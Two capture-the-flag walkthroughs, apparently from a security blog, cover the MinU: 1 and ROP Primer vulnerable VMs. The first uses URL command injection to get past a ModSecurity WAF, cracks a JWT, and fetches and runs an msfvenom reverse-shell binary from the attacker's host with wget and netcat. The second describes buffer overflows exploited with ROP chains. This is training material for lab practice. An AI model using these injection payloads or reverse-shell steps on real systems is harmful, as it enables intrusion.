Hack the MinU: 1 (CTF Challenge)

Hello Friends! Today we are going to solve another CTF challenge “MinU: 1” This boot2root is an Ubuntu Based virtual machine and has been tested using Virtual Box. The network interface of the virtual machine will take its IP settings from DHCP. Your goal is to capture the flag on /root.

You can download it from here: https://www.vulnhub.com/entry/minu-1,235/

Level: Easy/Intermediate

Penetrating Methodology

§  Network scanning (Nmap)

§  Web Directory Enumeration (Dirb)

§  Found RCE Vulnerability

§  Digging out JSON Web Token from inside ._pw_

§  Obtain password by using “c-jwt-cracker” for JSON Web Token

§  Generate elf payload (msfvenom)

§  Upload the backdoor inside /tmp

§  Obtain reverse session (Netcat)

§  Go for root access

§  Use envirnoment shell to spwan proper tty shell

§  Capture the Flag

WalkThrough

Since the IP of the target machine is 192.168.1.108, therefore let’s start with namp aggressive scan.

nmap –A 192.168.1.108

From the nmap scan result, we found port 80 is open for http service, let’s navigate to port 80 through browser.

Since we found nothing at the home page, therefore next we used dirb for web directory enumeration.

dirb http://192.168.1.108/ -X .php

With the help of above command, we try to enumerate .php extension files and luckily we found a “test.php” file.

So, when we explored /test.php file in the browser, it welcomes us with the following web page, where we found a hyperlink for the next web page.

Here the web page “Read last visitor data” was vulnerable to remote code execution. As you can observe that in the URL we try to run pwd command. As result, it shown /var/www/html as the current directory.

Next, we had used wafwoof for scanning the type of web application firewall used on the target machine.

wafw00f http://192.168.1.108

After we run wafw00f we find that the target machine has implemented modsecurity as web application firewall.

After finding out the WAF, we bypass it by executing following command in the URL.

http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+lsb_release -a 

Hence we found out the kernel details of the target machine.

Similarly, we run following command to find out available user directory inside the /home folder.

http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+ls /home

So we found bob could be the name of user directory.

Then we run following command to view the available file and folder inside /home/bob.

http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+ls /home/bob

Here we found a file”._pw_”

Then we opened the above obtained file with help of cat command and for that we run the following command.

http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+cat /home/bob/._pw_

It put up some encoded text in front of us which could be the password but I did not know much about it, what this was, therefore I take help from google and found out that this is a JSON Web Token.

JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA or ECDSA.

Source: https://jwt.io/introduction/

So I found a tool from the github to crack the JSON web token called c-jwt-cracker.

git clone https://github.com/brendan-rius/c-jwt-cracker.git

cd c-jwt-cracker/

apt-get install libssl-dev

make

Copy the encoded text from the “._pw_” to decrypt it.  Now run the c-jwt-crack tool and paste the encoded string as its argument as shown in the image.

./jwtcrack [paste code here]

This will give the password: “mlnv1”

Now let’s create a payload using msfvenom with the help of following command:

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.1.106 lport=4444 -f elf > /root/Desktop/shell

Above command will generate the elf payload, now we will transfer this malicious file “shell” to the target with the help of PHP server.

php –S 0.0.0.0:80

Then download the above malicious file with the help of wget, hence you can run the following command for downloading it into target machine.

http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+wget+-O+/tmp/shell+http://192.168.1.106/shell

Now let’s check whether the file is uploaded successfully or not!

Run following command to view the malicious file “shell” file inside the /tmp directory.

http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+ls /tmp

Yuppieee!!! In the given below image you can observe that we have successfully uploaded the shell file.

Now give the full permission to the uploaded file “shell” with the help of the following command:

http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+chmod 777 /tmp/shell

Let’s verify the given permission with help of the following command:

http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+ls -la /tmp/shell

Now let’s execute the file “shell” but do not forget to start netcat as the listener.

http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+/tmp/shell

nc –lvp 4444

Hurray!!! We got the reverse shell of the target’s machine and now let’s try to grab the flag.txt file to finish this task. For grabbing the flag.txt file we need the root access and proper tty shell of the machine.

Here we try to use python-one-liner to spawn a tty shell but unfortunately python was not installed on the target machine. So instead we used environment variable to spawn the tty shell.

Now run the following commands to spawn the tty shell and then try to capture flag.txt file.

bash -i

SHELL=/bin/bash script -q /dev/null

su root

Boooom!!!! We have root access now let’s fetch the flag.txt file.

ls

cat flag.txt

Hack the ROP Primer: 1.0.1 (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as ROP Primer. The credit for making this vm machine goes to “Bas” and it is another capture the flag challenge in which our goal is to capture all the flags to complete the challenge. You can download this VM here.

We have 3 levels available here and we are given the login credentials of all of 3 machines which are as follow:

Levels	Username	Password
Level 0	level0	warmup
Level 1	level1	shodan
Level 2	level2	tryharder

We had one binary per level, which we have to exploit each one to successfully extract flags from them.

You can download all the exploit used from here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.199.139 but you will have to find your own

netdiscover

LEVEL 0:

Now we use the given credentials to login through ssh as user level0. After logging in we find 2 files one executable file called level0 and another file called flag. Both files are owned by level1 user, but the binary file has suid bit set so we can execute it. When we run it we find that it takes a string as input and then outputs a message along with the string.

ssh level0@192.168.199.139

GDB-peda is provided by the author in the lab so we can directly analyse the binary in the target machine itself. Opening the binary in gdb we find that there is a gets function. Now gets is vulnerable to buffer overflow so we try to exploit it.

set disassembly-flavor intel

disas main

We created a 500 bytes long pattern using gdb-peda and used it as input for the binary.

pattern create 500

As soon as we passed the string we get a segmentation fault error, we use pattern offset function of gdb-peda to find the EIP offset and find that after 44 bytes we can completely overwrite EIP register.

pattern offset 0x41414641

Now we check for security and find that there is no ASLR but NX is enabled so we cannot execute shellcode on the stack.

checksec

As NX is enabled we can still use ret2libc attack to spawn a shell. But when we try to print the memory address of system we find that there is no system so we cannot execute /bin/sh to spawn a shell.

In the description we are given a hint that we can use mprotect to solve this problem.

p system

p mprotect

When we take a look at the man page for mprotect we find that it used to change protection of portions of memory by making it readable, writeable and executable. We also find it takes 3 parameters address, length of the memory that needs to be changes and protection level.

As we can make portions of memory readable, writeable and executable, we are going to use memcpy function to insert our shellcode into the block of memory.

p memcpy

Now need to select which section of the memory we are going to change, so we use gdb to see how the memory is mapped.

vmmap

We are going to take 0x080ca000 as target memory and we are going to mark 4KB of memory starting from 0x080ca000 as readable, writeable and executable. We create an exploit to this for us.

We save the output of this program in a file called input, we are going to use this as our input for the binary file.

python exp.py > input

When run the binary in gdb with using the input from our exploit, we take a look at the mapped memory and find that the memory block we selected was marked as readable, writeable and executable.

vmmap

Now we need to remove mprotect’s parameter from the stack so that we can redirect the flow of execution, mprotect function uses 3 parameters so we need to pop 3 values off the stack so we use ropgadget function in gdb and find a gadget pop3ret at 0x8048882.

ropgadget

Now we create the exploit to get an elevated shell. We use cat to keep the shell alive, we run the exploit and now we can access the flag. We take a look at the content of the file and find our first flag.

(python /tmp/exp.py; cat) | ./level0

LEVEL 1:

After completing level0, we login as level1 using the given credentials. We find a file called flag, bleh and a binary file called level1 with suid bit set. When we run the binary it says that error binding.

ssh level1@192.168.199.139

We check the listening ports on the target machine and find that port 8888 is open. We check processes with uid 1002 and find it is level1.

netstat -aepn | grep 8888

ps -aux | grep 1002

We connect it it and find it is an application that can be used to store and read files.

nc 192.168.199.139 8888

We open the binary in gdb and take a look at the assembly code for further analysis.

gdb -q level1

set disassembly-flavor intel

disas main

We setup a breakpoint on the main function. At main+115 we found that port 8888 is stored on the stack. We changed the value stored in the memory address to port 8889 so that we can run the program.

set {int}0xbffff6b0 = 8889

We create a 128 bytes long pattern using pattern_create.rb script in our system. So that we can pass the string as the name of the file.

./pattern_create -l 128

After changing the port number, we connected to it and stored a file with 128-byte size.

After mentioning the size of the file, it asks for the file name. We passed the 128 bytes long pattern as the file name.

nc 192.168.199.139 8889

When we switch to gdb we find that we get a segmentation fault.

We now use the patten_offset.rb script to find the EIP offset.

./pattern_offset.rb -q 0x63413163

We are given a hint in the description of this challenge that we can use read, write and open function to open the flag and read it.

p read

p write

p open

We are now going to need ropgadget, we need pop2ret for gadget for open function and pop3ret gadget for read function.

ropgadget

Now if we can get the address of the ‘flag’ string, then we can just read the flag and output it to the connected socket.

find flag

We create an exploit to get the flag. We run it and find the flag.

python level1.py

LEVEL 2:

After completing level1, we login as level2 using the given credentials. We find a file called flag and a binary file called level2 with suid bit set. When we run the binary, we find that it takes a string as an argument and then prints it.

ssh level2@192.168.199.139

We open the file in gdb for further analysis and find that at main+46 it calls strcpy function. As strcpy function is vulnerable to buffer overflow we exploit it.

gdb -q level2

set disassembly-flavor intel

disas main

On further analysis we find that it is similar to level0 binary file, we create a 500 bytes string and pass its argument and find the EIP offset to be 44 bytes.

pattern offset 0x41414641

This binary file has strcpy function instead of gets we cannot use “\x00”. So we use gadgets to do our work. We use ropshell.com to find all the gadgets used in this exploit.

We modified the exploit we created for level0 and inserted our gadgets. We use read function instead of memcpy function in this exploit. (Gadgets are explained in the exploit code).

As soon as we run our exploit we spawn a shell as root user. We open the flag file and get our final flag.